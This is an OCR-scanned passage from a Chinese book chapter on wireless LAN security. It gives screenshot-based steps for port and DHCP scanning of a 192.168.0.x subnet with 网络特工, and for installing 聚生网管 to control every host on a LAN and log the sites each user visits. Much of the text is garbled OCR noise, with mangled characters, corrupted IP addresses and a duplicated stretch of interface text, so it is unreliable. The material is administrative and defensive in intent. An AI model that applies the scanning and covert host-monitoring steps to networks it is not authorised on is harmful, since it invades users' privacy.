三 保存 着 以 靶 扫 于 |: 六 宇 5I 谨 

上 | = 


广告 位 招租 : 0.1 元 /平方 瞩 恋 /年 


Y 
> 


就 考 lr J 


[step 园 在 “网 络 特工 ” 主 窗口 左边 的 列表 中 
rp 理 ” 选 项 ， 在 弹出 的 快捷 菜 
单 中 选择 “添加 新 网 段 ” 选 项 ， 即 可 打开 
“添加 新 网 段 ” 对话 框 ， 如 下 图 所 示 。 


添加 新 网 段 xX 
网 段 开 始 IF 地 址 : 


网 段 结 束 IF 地 址 : 192 .168 . 0 . 253 
网 段子 网 撞 码 : 255 .255 ,255 . 0 
网 段 网 关 IF 地 址 : 192 .166 .0 .1 


step 图 在 设置 网 络 的 开始 IP 地 址 、 结 束 IP 地 
0 
按钮 ， 即 可 在 “网 络 特工 ” 主 窗 口 左 边 的 
“网 络 管理 ”选项 中 看 到 新 添加 的 网 段 ， 
如 下 图 所 示 。 
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@ Kennear - 网 次 转 工 一 口 x 
文 履 { 月 ” 豆 大 I[V】 工兵 四” 各 荔 [H] 


192. LEB.0.2 
192. 1é8.0.253 


255. 265. 255. 0 
192. 1€6.0.1 


广告 广 稿 祖 : 0. 1 元 /平方 仇 案 /年 


— iF | 


双击 该 网 段 ， 即 可 在 右边 打开 的 窗口 
中 ， 看 到 刚 设置 的 网 段 中 所 有 的 信息 ， 如 下 
图 所 示 。 


ee] Kennear - 网 堪 先 工 一 口 x 


的 卡 
[SD Mtheros LI Gieabit Btbernert 10/ 
1 


已 网 归 钨 捍 ' 布 鸳 点 击 添 加 网 耻 ) 
-- 同 段 192. 188. 0.2 - 192.16 
| 
-互联 里 闲 
192. ]68. 0. LL 
192. 168. 0. 12 
192. 166.0. 13 
【152.166.0. 1 


192. 166.0. 15 
192. 166.0. 16 


192. 168 0 20 Y 


至 新 扫 短 风 入 | 
[庆生 当 证 个 广告 他 后 朋 : 0.5 元 


< 


同 陨 开始 IF 地 址 : 192.168. .0.2 在 晓 : 5 
同 屋 车 束 IE 地 H: 192. 166.0. 5653 训 寻 ;28 
同 段 于 网 换 到 :255. 站 5. 255.0 已 是; 站 


况且 现 关 IE 地 直 : 192. 156.0. 1 。 
ev a 如 再 防水 搞 扣 加 同 Hi 时 列 赤 | 


EF | 


单 击 其 中 的 “管理 参数 设置 ”按钮 ， 
即 可 打开 “管理 参数 设置 ”对 话 框 ， 在 其 
中 对 各 个 网 络 参 数 进行 设置 ， 如 下 图 所 示 。 


网 版 参数 设置 x 
- 务 数 
[i192 168.0.1 网 阁 沉 宽 : 上 行 32 亚 司 下行 128 11/S 
管理 主机 炳 靳 : Fi 每 10.000 秒 一 次 “管理 路 由 频 平 : | 每 0. 000 秒 一 次 
-区 略 

厂 不 自动 扫 撕 网 引 厅 保护 自己 不 祝 其 它 软件 官 理 上 网 。。 厂 久富 林 关 WO 物理 地 址 
DE 分 钟 后 不 从 被 官 埋 主 机 收 到 尾 何 强 握 ,或 震 。 厅 主机 抵抗 宫 理 时 , 启用 特殊 官 理 演 正 
在 历 人 放 #h 后 片 让 正常 第 理 沛 本 


-提示 - | [日 志 - 
厂 全 郑 过 择 厂 全 部 选择 
厂 上 线 提示 厂 更换 IWc 机 上 提示 厂 上 贱 日 志 厂 更 搞 I5 地 址 日 志 
厂 下 线 捍 示 厂 管理 提示 厂 下 绕 日 志 厂 管理 日 志 
厂 条 回应 提示 厂 防 训 提示 厂 多 加 应 日 志 厂 防 基 日 志 
厂 工作 组 消息 提示 。 。 厂 网 址 映射 提示 厂 工作 组 消息 日 志 。。” 厂 网 址 映射 日 志 


OK | Cancel | 


单 击 “ 网 址 映射 列表 ”按钮 ， 即 可 打 
开 “ 网 址 映射 列表 ”对 话 框 ， 如 下 图 所 示 。 


网 址 狐 针 列表 x 
输入 要 解析 的 网 杜 [ 趟 要 手 入 http: A : 


超时 时 间 : Po 种 开始 解析 


服务 如 返 四 信息: 
请 点 击 达 择 DY5 服 芳 器 : 


61. 128. 114. 134 
61. 128. 114. 167 


SR: 


192. 163. 0. 104 


TT Rhy 
Hi 本 地 1TT? 睹 务 
不 上 胆 征 YYY .上 Tear con 
不 骏 击 此 外 本 六 好 射 1 1a) 强 击 比 直销 久 映射 TF 对 应 prt 


添加 有 用 | 


在 “DNS 服务 器 


OF | Cancel | 


析 ” 按 钮 ， 即 可 对 选中 的 DNS 服务 器 进行 


解析 ， 待 解析 完毕 后 ， 即 可 看 到 该 域名 对 


应 的 主机 地 址 等 属性 ， 如 下 图 所 示 。 


rr 
站 [ 丰 杰 手 六 http: YA : 


超时 时 间 : Po 种 开始 解析 


请 点 击 选择 TDY5 服 务 器 


51. 125. 114. 134 
51. 125. 114. 157 


网 址 鳃 射 列 去: 


_ 要 所 里 肌 的 网 址 陵 射 I?3j 应 网 直 | _ 
其 它 宇 部 向 所 中 0.104 本 地 WT? 服务 

Www. Jrermaar. aon 不 由 向 Veo. kanmaear. oon 

六 十 此 处 加 入 要 撤 蛛 对 的 同 址 ( 款 要 町 入 癌 训 沪 ttE: 4 观 击 比 处 箱 入 职 射 ITV4) 强 击 此 由 输入 昭 冉 IF 对 应 Fa 


添加 耻 际 | OF | Cancel | 


step 图 在 “网 络 特工 ” 主 窗口 左边 的 列表 中 
Fr “互联 星空 ”选项 ， 即 可 打开 “互联 
星空 ”窗口 ， 在 其 中 即 可 进行 端口 扫描 和 
DHCP 服 务 扫 描 操 作 ， 如 下 图 所 示 。 


- 口 xX 
是 阿 卡 ER a 
日 先 | 业 = 了 主机 开 1 汉口 
加 hthuros Ll Gigahit Bthor 了 居 芳 扫 帮 和 
后 egg 
.168.0.2 ~ iC. 166 
Y 
< > 

ww 于 广 


在 右边 的 列表 中 选择 “端口 扫描 ? 
ea 本 
“端口 扫描 参数 设置 ”对 话 框 ， 如 下 图 
所 示 。 


IP” 文 本 区 域 中 选 
中 要 解析 的 DNS 服务 器 后 ， 单 击 “ 开 始 解 


第 14 章 ”无 线 局 域 网 的 安全 防护 


端口 扫 痛 参数 设置 xX 


IP 版 本 : | -| 协议 类 型 : |Tc ”|] 厂 显示 扫描 进度 


起 始 IF: lis2.168.02 mn 
结束 IP: |192. 168. 0. 253 


Cancel | 


端口 列表 : |0-65535 


Ee 
国 《( 芝 用 庙 D | 
-隐蔽 性 


使 用 IC 地 址 J001E3CAD135F (大 写 ) 
和 IP 地 址 「192. 168.0.104 进行 扫描 


在 设置 起 始 IP 和 结束 IP 之 后 ， 单 击 
es lh 用 的 端口 显示 
在 “端口 列表 ”文本 区 域内 ， 如 下 图 所 示 。 


端口 扫描 参数 设置 xX 


TP 版本: |IFv4 ”| 协议 类 型 : TCF ”| 厂 显示 扫描 进度 


起 始 IF : |192. 168.0.2 
OK | 

结束 IP: |192. 168. 0. 253 

Cancel | 
器 口 列表 : |21, 23, 25, 53, 80, 110, 135- 

得 |139, 161, 443, 8010, 8080 

二 上 如 
= 表示 


EC 


(大 与 ) 
进行 扫描 


单 击 OK 按钮 ， 即 可 进行 端口 扫描 操 
作 ， 在 扫描 的 同时 ， 将 扫描 结果 显示 在 下 
面 的 “上 日志” 列表 中 ， 在 其 中 即 可 看 到 各 
个 主机 开局 的 端口 ， 如 下 图 所 示 。 


动 Kennear - 网 治标 工 
文件 用 ” 竟 石 IV] 工 暴 由” 守 序 [H) 


ro 区 
BE-Atheros Ll Gicabit DR 
此 


为 1 :10 的 主 
92. 163.0. 11 多 
se 


| 上 
全 LE 多 理光 Tb 为 192. 1 的 . 0, td 上 加 
为 132. 1 拘 .0 114 的 二 机 .上 

* 


在 “互联 星空 ”窗口 右边 的 列表 中 
“DHCP 服 务 扫描 ”选项 后 ， 单 击 “ 开 
始 ” 按 钮 ， 即 可 进行 DHCP 服 务 扫 描 操作 ， 
如 下 图 所 示 。 


289 
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区 Kennear - 网 党 符 工 一 口 x 
文件 IF) ”到 只 (V) 工具 [T) 码 助 (H] 


[Er | 功 聊 训 昌 二 和 ge 
3 ee ste | Ee 和 从 开本 这. 有 grne 


昌吉 

6 开 如 扫 a 1 号.0. 去 2 前 王 和 机 
为 人 188. 0. S52 的 主机 不 在 妹 ! 

8 开 妈 扫 玛 I 为 13C. 166.0.253 的 主机 


a i134 


ee gt2 : 8 ee 114. 167 


路 由 ; ig2 100 0 1 


无 线 局 域 网 安全 辅助 
工具 


面 对 黑 客 针对 无 线 局 域 网 的 种 种 攻 
击 ， 无 线 局 域 网 管理 者 可 以 使 用 局 域 网 安 
全 辅助 工具 来 对 整个 无 线 局 域 网 进行 管 
理 。 本 节 将 介绍 几 球 最 为 经 典 的 局 域 网 畏 
助 软件 ， 以 帮助 大 家 维护 无 线 局 域 网 ， 从 


而 保护 无 线 局 域 网 的 安全 。 
14.4.1 聚 生 网 管 


聚 生 网 管 系统 是 聚 生 科技 在 深入 分 
析 了 主流 无 线 局 域 网 监控 软件 技术 的 基础 
上 ， 经 过 目 主 创新 和 不 断 测试 ， 最 终 研发 
成 功 的 一 套 优秀 的 网 络 监控 软件 。 在 无 线 
局 域 网 的 任意 一 台 计 算 机 上 安 六 该 软件 就 
可 以 控制 整个 无 线 局 域 网 的 P2P 下 载 、 各 种 
聊天 工具 、 股 票 软 件 、 游 戏 软件 等 ， 使 得 
网 管 人 员 可 以 在 一 台 控制 机 上 即 可 以 控制 
任意 一 台 无 线 局 域 网 主机 ， 从 而 极 大 地 提 
高 了 工作 效率 。 


1. 安装 聚 生 网 管 


step 加 双击 下 载 的 聚 生 网 管 安装 程序 ， 即 可 
打开 “许可 证 协议 ”对 话 框 ， 在 其 中 可 以 
查看 软件 许可 协议 信息 ， 如 下 图 所 示 。 
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一 X 


许可 证 协议 
在 安装 染 生 网 管 文 用 版 之 前 ， 请 检阅 授权 条 款 。 


检阅 协议 的 其 余部 分 ， 请 按 [PsDn] 往 下 卷 动 页 面 。 


所 有 安装 和 使 用 避 聚 生 网 管 % 的 用 户 必须 蒲 足 并 严格 道 守 以 下 各 项 条 款 ， 否 由 请 ^ 
停止 安装 、 使 用 和 传播 : 


一 、《 浓 生 网 管 涩 受 中 华人 民 共 和 国 著作 权 法 及 中 国 和 国际 著作 权 条 约 和 其 它 知 
， 用 户 不 得 有 任何 侵害 姑 染 生 网 管 淮 相关 一 切 权利 的 行 


、 刀 案 生 了 网管 当 产品 各 版 本 、 随 附 的 各 种 资料 一 切 所 有 权 和 知识 产权 均 由 大 势 


TT ptr 1 an 


i 加 gE 1 地 加 [取消 (] ， 
取消 (C) 


单 击 “我 接受 ”按钮 ， 打 开 “ 选 定安 
i 
标 文件 夹 ， 如 下 图 所 示 。 


命 肾 生 网 管 试 用 版 安装 一 Xx 


选 定安 装 位 置 
选 定 滋生 了 网 宣 谍 用 版 要 安装 的 文件 夹 。 


re 


浏览 (B)... 


所 需 空间 : 22. 9MB 
可 用 空间 : 54. 46B 


< 上 一 步 (P) [ 安 蔡 (1) |] ， 取 消 (C) 


单 击 “ 安 装 ” 按 钮 ， 即 可 开始 安装 聚 
网 管 程序 ， 并 显示 安装 的 进度 ， 如 下 图 
所 示 。 


和 试用 版 正在 安装 ， 请 等 候 。 


复制 到 : D: \Langos\Folicy\ 吕 限制 [4 络 游戏 策略 


显示 细节 (1) 


《< 上 一 步 (F) ”关闭 上) 取消 (C) 


[step 贺 安装 完成 后 ， 弹 出 “安装 完成 ” 窗 


口 ， 单 击 “ 关 闭 ” 按 钮 ， 完 成 程序 的 安 
装 ， 如 下 图 所 示 。 


安装 完成 
安装 程序 已 砍 功 垢 运行 齐 成 。 


显示 细节 [D) 


取消 (C) 


: 上 一 步 [P) 


2. 聚 生 网 管 的 配置 


在 使 用 聚 生 网 管 这 款 软件 之 前 ， 需 要 
先 对 其 进行 配置 ， 配 置 聚 生 网 管 的 具体 操 
ui 
选择 “开始 ”一 “所 有 应 用 ”一 “ 聚 

Fi py 即 可 打开 “监控 网 段 配 
ee eg oh 


监控 殉 请 配 和 一 x 


注 ; 如 果 你 尚未 创建 网 段 , 则 可 以 点 击 人 即 可 进行 创 
疆 ; 之 后 你 可 以 观 圭 鉴 注 网 段 或 单 主 迁 中 然 关 点 去 “开始 鉴 注 ” 即 可 
进入 主 错 町 。 


在 进行 监控 之 前 ， 需 要 添加 要 监控 的 


网 段 ， 单 击 “ 新 建 监控 网 段 ” 按 钮 ， 即 可 


打开 “网 段 名 称 ” 对 话 框 ， 如 下 图 所 示 。 


网 良 鱼 称 x 


gi 


计 输 入 新 闻 耻 主 称 : 


VLAN 20170814182339 


注 : 请 扩 呈 使 用 笨 认 网 段 包 称 以 免 出 现 司 苦 网 段 而 彩 响 正 圳 监控 ! 


< 上 -小 (B) 取消 大 肝 
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在 “请 输入 新 网 段 名 称 ” 下 方 的 文本 
框 中 输入 网 段 的 名 称 之 后 ， 单 击 “ 下 一 步 ” 
按钮 ， 即 可 打开 “选择 网 卡 ” 对 话 框 ， 如 下 
图 所 示 。 


选择 网 卡 x 


区 ?ji 近 网 段 配置， | 
请 为 网 捐 选 择 对 应 的 网 卡 : 更新 网 卡 信息 
Atheros L1 Gigabit Ethernet 10/100/1000Base-T Controller ~ 
本 机 IP 地 址 : 192.168.0.104 
本 机 MAC 池 址 : 00-1E-8C-AD-13-5F 
子 殉 挤 码 : |255255255.0 
[wy | 
本 网 关 IP 段 : 192.168.0.0 - |192.168.0.255 
网 关 MAC 池 址 : F4-83-CD-33-50-73 检测 | 


注 : 为 了 保证 正常 鉴 深 ， 建 议 点 击 “ 检 册 ” 技 钮 以 检 音 网 将 连接 状况 ; 如 果 最 终 能 
够 Ping 通 网 关 ， 则 说 明了 网 络 正 常 可 以 浆 沪 下 一 步 操作 ; 否则 潜 登 录 网 关 ( 如 路 由 器 、 
防火 二 或 交换 机 ) 生 者 其 LAN 口 对 应 的 MAC 地 址 ， 只 有 鞭 取 正确 的 网 关 MAC 节 址 才 
可 以 进行 监控 。 


[ED] [十 | 下 


[step 加 为 该 网 段 选择 对 应 的 网 卡 后 ， 单 去 
“下 一 步 ” 按钮 ， 即 可 打开 “出 口 带 宽 ” 
对 话 框 ， 如 下 图 所 示 。 


出 口 市 宛 x 


2 下 


监控 网 段 配置 .. . 


本 网 段 公 网 出 口 捷 入 市 宫 : Auto Detect v 


< 上 一 步 (B) 取消 帮 肝 


在 “本 网 段 公 网 出 口 接 入 带宽 ” 右 侧 
的 下 拉 列 表 中 选择 “Auto Detect (自动 检 
测 ) ”选项 后 ， 单 击 “ 完 成 ”按钮 ， 将 会 
返回 “监控 网 段 配置 ”窗口 ， 在 其 中 即 可 
看 到 所 配置 的 监控 网 段 信息 ， 如 下 图 所 示 。 
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监控 网 段 配置 一 X 
图 norceolot2552552550 
新 建 多 网 段 监控 

编辑 监控 网 段 

删除 监控 网 段 

清空 监控 网 自 


注 : 如 果 你 尚未 创建 网 段 , 则 可 以 点 击 “ 新 建 鉴 控 网 段 ” 即 可 进行 创 
建 ; 之 后 你 可 以 双击 监控 网 段 或 单 击 选中 然后 点 击 “ 开 始 监控 ” 即 可 
进入 主 界面 。 


当 确 定 所 配置 的 监控 网 段 信 息 准 确 无 误 后 ， 单 击 “开始 监控 ” 按钮 ， 即 可 打开 “ 聚 
生 网 管 ” 主 窗口 ， 如 下 图 所 示 。 


聚 生 网 伟 V2016 坛 用 版 [网 岳 名 称 :VLAN_20170814182339] 
设置 操作 日 志 显示 访问 关于 升级 大 即 运程 协助 


一 口 X 


二 
O.O 0 O00 @@ Qe © sp MM 
启动 管理 扫 接 主机 | 配置 第 略 ”全 局 设 伍 ”去 全 防 逢 ”扩展 播 件 ”日志 吾 鹿 产品 详解 。 同 美 对 比 使 用 说 明 堂 见 问题 。 访问 官网 购买 流 得 联系 我 们 有 未 不 全 方 vo 起 周 送 


派 策 四 v 导入 | 导出 | 


口 全 这 口 自动 过 市 新 加 入 主机 并 白 动 指派 | 时 


不 拆 王 (PP 山 让 导 就 他 打 育 训 从 了 态 U 语 害 动 梳 访 和 手机 靳 ,不 字 脱 (US6 居 灯 府 党 ,人 广 炉 守 恰 ..... 
口 ] 言 动 禁止 无 线路 由 器 口 ] 言 动 禁止 手机 /平板 口 自动 禁 月 随访 wifi 口 禁止 修改 IP 口 禁 止 收 改 MAC ” 丫 只 明示 IP 和 MAC 纤 定 电脑 。 ”口上 只 双 许 IP 和 MAC 综 定 电脑 上 网 
1p 地址 信 J 色 控 需 ) ”主机 各 (点 主 修改 ] (总) 上 行 (0.00 KB/S) (总 ) 下 行 (0.00 KB/S)” 连 授 状 态 
口 大 192.168.0.104 控制 机 


M/|。 所 有 用 户 访问 日 志 。 单个 下 户 访 同 日 志 ( 在 主机 表 中 单 主 ) 
协议 类 型 。” 订 IP 地 址 


0.)0 0.00 连接 正 竺 


口 输出 口 闪 
源 主 机 ” 源 M..， 目的 IP 地 址 。 “目的 .。 访问 内 容 


< 


> 


口 连 十 IP/MAC 变 化 癌 柱 出 ARP 玫 志 ”巴松 测 晴 导 wifijwifi 共 享 检测 无 绎 路 由 器 /手机 /于 板 。 | 得 者 


旱 间 类 型 iP 地 址 MAC 池 址 ”描述 


多 和 于 闪 详 主语 米 庆 他 竺 同 训 开局 考 广 闪 庆 六 他 亲 开 大 简 入 、 抠 悦 课 作 记 起 ,说 筷 守 伦 .. 
状态 


县 池 所 合 后 乓 认 安 孝 稼 莽 芝 售 郧 芝 区 党 ， 功 先 这 和 演员 多 启 了 上 向 合 到 其 作 ,省 芒 雹 让 
主机 挟 数 : 1 在 疆 : 1 可 续 :0 聚 生 网 管 系 统 国内 唯一 圭 全 禁止 迅 雪 下 载 、 禁 止 QQ 游戏 、 限 制 PPS 网 将 视频 等 


全 提示 : 用 户 可 以 根据 需要 建立 多 个 网 段 。 如 果 想 监控 第 二 个 网 段 ， 请 再 次 打开 一 个 聚 
生 网 管 的 窗口 ， 从 中 选择 想 要 建立 的 第 二 个 网 段 ， 然 后 单 击 “开始 监控 ”按钮 即 可 。 


3. 聚 生 网 管 的 使 用 


在 配置 完 聚 生 网 管 要 监控 的 网 段 后 ， 隋 可 以 利用 该 工具 对 整个 无 线 局 域 网 进行 管理 ， 
其 具体 操作 步骤 如 下 : 


step 图 在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 启 动 管 理 ” 按 钮 ， 即 可 扫描 到 所 有 在 线 主机 ， 并 
在 下 方 的 列表 中 显示 出 来 ， 如 下 图 所 示 。 
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聚 生 网 竺 V2016 试 用 版 网 段 和 名称 :VLAN_20170814182339] - D x 
设置 操作 日 志 旦 示 访问 关于 升级 孝 肥 运程 协助 


QQeeee ee 加 © 0 0 0 © © :twtr 


产品 详解。 同 美 对 比 。 使 用 说 明 。 常见 问题 访问 官网 。 购买 流 得 。 联系 我 们 ”多 坊 用 方便 ,一 牙 式 周知 
个、 


中 全 壬 自动 控制 新 加 入 主机 并 语 动 措 派 | 直 指 派 笔 骆 ~ 导入 | 导出 | EAT SE ， 洋 蒂 完 此 … 
口 ] 握 动 蘑 止 无 线 串 由 器 口 ] 握 动 蘑 止 手机 / 干 板 癌 ] 己 动 伴 月 随 殷 w 放 品 ] 茜 止 修改 |P 品 ] 茜 止 修改 MAC 。[] 只 至 示 IP 和 MAC 部 定 玫 脑 。。[] 只 齐 许 |P 和 MAC 缆 定 玫 脑 上 网 


IP 地 址 人 J 勾 控 制 ) 主机 各 (点 主 修改 | 已) 上 行 (155.17 K.。 ( 剖 下 行 (1674.34 .… 所 有 订户 访 问 日 志 ”单个 用 户 访问 日 志 [ 在 主机 索 士 单 主 ) 口 到 出 口 ] 搓 总 

口 杜 192.168.0.104 控制 机 155.17 : 访问 时 间 协议 类 型 。” 源 IP 池 址 逐 主机 源 M..。 目的 IP 地 址 目的 .， ”访问 内 容 
口 枉 192.168.0.112 AFOIG-611211. 0.0 

口 册 192.168.0.106 CESKTOP-5CV.. 0， 

口 时 192.168.0.107 DESKTOP-D5K... 

口 村 192.158.0.109 -- 

口 枉 192.168.0.108 网 盗 科技 

口 届 192.168.0.114 AFOIG-702111.。 0. 

口 册 192.168.0.102 -- 

口 矶 1921658.0.105 -- 


< > 
门 鲁 出 |P/MAC 要 化 ” 口 豪 二 ARP 攻 二 检测 随身 wifi/wif 坪 京 。 时 窒 则 无 污 路 白 锋 /手机 /平板 。 至 专 
时 间 考 型 IP 地 址 MAC 地 泪 揪 述 


不 加 王 六 实 广 作 司 过 就 件 全 向 襄 实 县 等 六 六 安 广 件 1 条 并 、 撩 币 入 履 、 婴 | 避 碟 作 有 去， 说 炉 i 履 … 闫 竺 认定 定 且 内 字 关 展 全 感人 二 内 展 疝 并 功 训 展 入 记 WW 呈 上 导 定 古 六 许 ， 说 炉 二 人 愉 … 
状态 主机 所 数 : 9 在 续 :9 离合 :0 桶 生 网 管 夫子 “会 新 直 这 ”架构 ， 矢 网 段 管理 员工 上 网 行为 最 快捷 、 最 简单 ! 


[step 图 选中 主机 前 面 的 复 选 框 ， 即 可 开始 控制 并 显示 计算 机 宽带 、 上 网 网 址 或 拦截 日 志 等 
pe 如 下 图 所 示 。 取 取消 选中 则 所 有 控制 全 部 失效 。 


票 生 网 管 V2016 涝 用 版 [网 版 各 称 :YLAN_20170814182339] 口 x 
设置 操作 日 志 显示 访问 关于 升级 帮 即 运程 协助 


0O.0000000000 0 © © :lt 


停止 监 深 。。 沁 沉 主机 “| 配置 第 略 。 全 局 设 千 。 玄 全 防 部 。 扩展 括 件 。 日 二 至 河 | 产品 洋 解 。 同 关 对 比 。 使 用 说 明 。 竺 见 有 本 。 访问 舍 网 。 购买 流 在 。 联系 我 们 外 起 五 和 经 一 此 不 网 失 
4 人 


加 全 和 庄 。 ”| 富 动 控制 新 加 入 主机 并 合 a 计 久未 指派 策 熙 (至 示 芝 完 . 网 址 ”~ 导入 | 导出 | 二 各 圣 WW 必 测 人 车 训 他 展 方 训 共 用 U 启 褒 动 大 语 入 于 机 车 ,不 虹 有 输 USb6 司 灯 冯 宣 ， 溯 六 吉 克 .… 
口 ] 弓 动 葬 止 无 线 趾 由 器 口 ] 握 动 蘑 止 手机 / 干 板 中 白 动 苦 月 随 写 wifi 门禁 止 修改 IP 门 荣 止 收 改 MAC [只 呈 示 |P 和 MAC 疮 定 志 脑 。 [只 多 许 IP 和 MAC 纱 定 电 脑 上 网 


iP 地 址 人 J 名 控 制 ) 主机 各 (点 主 修改 ] (点 ) 上 行 (0.00 KB/S) “(各 下 行 (0.00 KB/S) ”连接 状态 MAC 池 址 所 有 月 户 沪 问 日 志 。 总 个 由 户 访问 日 志 ( 在 主机 妆 外 曾 主 ) 口 贺 出 [ 
口 杜 192.168.0.104 控制 机 0.)0 |. 连接 正常 00:1E:8C:AD:13:5F 
口 村 192 168.0.112 AFOIG-511211.. 0.00 |. Ca:60:00:0C:CC:D1 
口 册 192.168.0.106 DESKTOP-5CV.. 0. 00:23:24:D9:86:E5 

回 果 192.168.0.107 DESKTOP-D5K.。 0. 58:FB:84:FB:58:10 

口感 192.168.0.109 -- , |, 70:E7:2C:D3:11;:24 
口 央 192.168.0.108 网 阁 科技 |, |. 40:A5S:EFDE:A9:D3 
口 册 192.168.0.114 AFOIG-702111..。 0. , C0:CB:38:7D:A6:0E 
口 旺 192.158.0.102 -- , 84:BE:52:3B:17:01 

口 村 192168.0.105 -- E0:DD:C0:C0:1A:5D 
口 杜 192.168.0.101 -- , A4:44:D1:D3:48:7B 


VW 访问 |192.168.0.107 
2017-8-14 19:05:57 访问 192.158.0.107 eee bE | 1.82.232.12 
2017-8-14 19:05:57 访问 192.168.0.107 ene :F117.23.2.79 
2017-8-14 19:06:02 lo] 192.168.0.107 Es :F... 218.30.116.24 


口 显 192.168.0.100 -- . A4:5E:60:16.7AA1 
口 村 192.158.0.103 -- 。 ， 68:FB:7E:EA:FC:FA 


< 
时 间 类 型 Ipis 址 MACEtE 三 下 


不 下 王 六 详 六 他 愉 熔 就 作 会 厨 i 癌 实 版 各 座 闪 详 广 J] 开 害 秘 米 履 婴 必 这 作 昌 去, 疗 炉 宙 履 .… 大 半 认定 呈 司 内 字 搓 展 合 委培 办 展 疝 党 ， 功 训 展 革 所 WW 呈 上 民 定 古训 从 ,六 入 宙 愉 ... 
状态 : 监控 中 主机 所 数 : 12 在 续 :11 襄 竺 :1 


。 ve =- 一， 一 -一 一 


[sep 图 在 主机 列表 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “控制 全 部 主机 ”菜单 命令 ， 即 可 控 
制 全 部 主机 ， 如 下 图 所 示 。 

[step 加 虽然 可 以 控制 全 部 主机 ， 但 只 是 让 用 户 查 看 带宽 ， 并 没有 对 主机 进行 其 他 的 控制 。 
如 果 想 启用 各 种 控制 (如 下 载 、 聊 天 等 ) ， 双 击 某 台 主机 信息 ， 即 可 弹出 “新 建 策略 ” 
消息 框 ， 将 看 到 “您 已 经 定义 过 策略 ， 现 在 继续 新 建 一 个 策略 吗 ? ”对 话 框 ， 如 下 图 
所 示 。 
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聚 生 网 竺 V2016 试 用 版 网 段 和 名称 :VLAN_20170814182339] - D x 
设置 操作 日 志 旦 示 访问 关于 升级 孝 肥 运程 协助 


QQeeee ee 加 © 0 0 0 © © :twtr 


产品 详解。 同 美 对 比 。 使 用 说 明 。 常见 问题 访问 官网 。 购买 流 得 。 联系 我 们 ”多 坊 用 方便 ,一 牙 式 周知 
个、 


中 全 壬 自动 控制 新 加 入 主机 并 语 动 措 派 | 直 指 派 笔 骆 ~ 导入 | 导出 | EAT SE ， 洋 蒂 完 此 … 
口 ] 握 动 蘑 止 无 线 串 由 器 口 ] 握 动 蘑 止 手机 / 干 板 癌 ] 己 动 伴 月 随 殷 w 放 品 ] 茜 止 修改 |P 品 ] 茜 止 修改 MAC 。[] 只 至 示 IP 和 MAC 部 定 玫 脑 。。[] 只 齐 许 |P 和 MAC 缆 定 玫 脑 上 网 


IP 地 址 人 J 勾 控 制 ) 主机 各 (点 主 修改 | 已) 上 行 (155.17 K.。 ( 剖 下 行 (1674.34 .… 所 有 订户 访 问 日 志 ”单个 用 户 访问 日 志 [ 在 主机 索 士 单 主 ) 口 到 出 口 ] 搓 总 

口 杜 192.168.0.104 控制 机 155.17 : 访问 时 间 协议 类 型 。” 源 IP 池 址 逐 主机 源 M..。 目的 IP 地 址 目的 .， ”访问 内 容 
口 枉 192.168.0.112 AFOIG-611211. 0.0 

口 册 192.168.0.106 CESKTOP-5CV.. 0， 

口 时 192.168.0.107 DESKTOP-D5K... 

口 村 192.158.0.109 -- 

口 枉 192.168.0.108 网 盗 科技 

口 届 192.168.0.114 AFOIG-702111.。 0. 

口 册 192.168.0.102 -- 

口 矶 1921658.0.105 -- 


< > 
门 鲁 出 |P/MAC 要 化 ” 口 豪 二 ARP 攻 二 检测 随身 wifi/wif 坪 京 。 时 窒 则 无 污 路 白 锋 /手机 /平板 。 至 专 
时 间 考 型 IP 地 址 MAC 地 泪 揪 述 


不 加 王 六 实 广 作 司 过 就 件 全 向 襄 实 县 等 六 六 安 广 件 1 条 并 、 撩 币 入 履 、 婴 | 避 碟 作 有 去， 说 炉 i 履 … 闫 竺 认定 定 且 内 字 关 展 全 感人 二 内 展 疝 并 功 训 展 入 记 WW 呈 上 导 定 古 六 许 ， 说 炉 二 人 愉 … 
状态 主机 所 数 : 9 在 续 :9 离合 :0 桶 生 网 管 夫子 “会 新 直 这 ”架构 ， 矢 网 段 管理 员工 上 网 行为 最 快捷 、 最 简单 ! 


[step 图 选中 主机 前 面 的 复 选 框 ， 即 可 开始 控制 并 显示 计算 机 宽带 、 上 网 网 址 或 拦截 日 志 等 
pe 如 下 图 所 示 。 取 取消 选中 则 所 有 控制 全 部 失效 。 


票 生 网 管 V2016 涝 用 版 [网 版 各 称 :YLAN_20170814182339] 口 x 
设置 操作 日 志 显示 访问 关于 升级 帮 即 运程 协助 


0O.0000000000 0 © © :lt 


停止 监 深 。。 沁 沉 主机 “| 配置 第 略 。 全 局 设 千 。 玄 全 防 部 。 扩展 括 件 。 日 二 至 河 | 产品 洋 解 。 同 关 对 比 。 使 用 说 明 。 竺 见 有 本 。 访问 舍 网 。 购买 流 在 。 联系 我 们 外 起 五 和 经 一 此 不 网 失 
4 人 


加 全 和 庄 。 ”| 富 动 控制 新 加 入 主机 并 合 a 计 久未 指派 策 熙 (至 示 芝 完 . 网 址 ”~ 导入 | 导出 | 二 各 圣 WW 必 测 人 车 训 他 展 方 训 共 用 U 启 褒 动 大 语 入 于 机 车 ,不 虹 有 输 USb6 司 灯 冯 宣 ， 溯 六 吉 克 .… 
口 ] 弓 动 葬 止 无 线 趾 由 器 口 ] 握 动 蘑 止 手机 / 干 板 中 白 动 苦 月 随 写 wifi 门禁 止 修改 IP 门 荣 止 收 改 MAC [只 呈 示 |P 和 MAC 疮 定 志 脑 。 [只 多 许 IP 和 MAC 纱 定 电 脑 上 网 


iP 地 址 人 J 名 控 制 ) 主机 各 (点 主 修改 ] (点 ) 上 行 (0.00 KB/S) “(各 下 行 (0.00 KB/S) ”连接 状态 MAC 池 址 所 有 月 户 沪 问 日 志 。 总 个 由 户 访问 日 志 ( 在 主机 妆 外 曾 主 ) 口 贺 出 [ 
口 杜 192.168.0.104 控制 机 0.)0 |. 连接 正常 00:1E:8C:AD:13:5F 
口 村 192 168.0.112 AFOIG-511211.. 0.00 |. Ca:60:00:0C:CC:D1 
口 册 192.168.0.106 DESKTOP-5CV.. 0. 00:23:24:D9:86:E5 

回 果 192.168.0.107 DESKTOP-D5K.。 0. 58:FB:84:FB:58:10 

口感 192.168.0.109 -- , |, 70:E7:2C:D3:11;:24 
口 央 192.168.0.108 网 阁 科技 |, |. 40:A5S:EFDE:A9:D3 
口 册 192.168.0.114 AFOIG-702111..。 0. , C0:CB:38:7D:A6:0E 
口 旺 192.158.0.102 -- , 84:BE:52:3B:17:01 

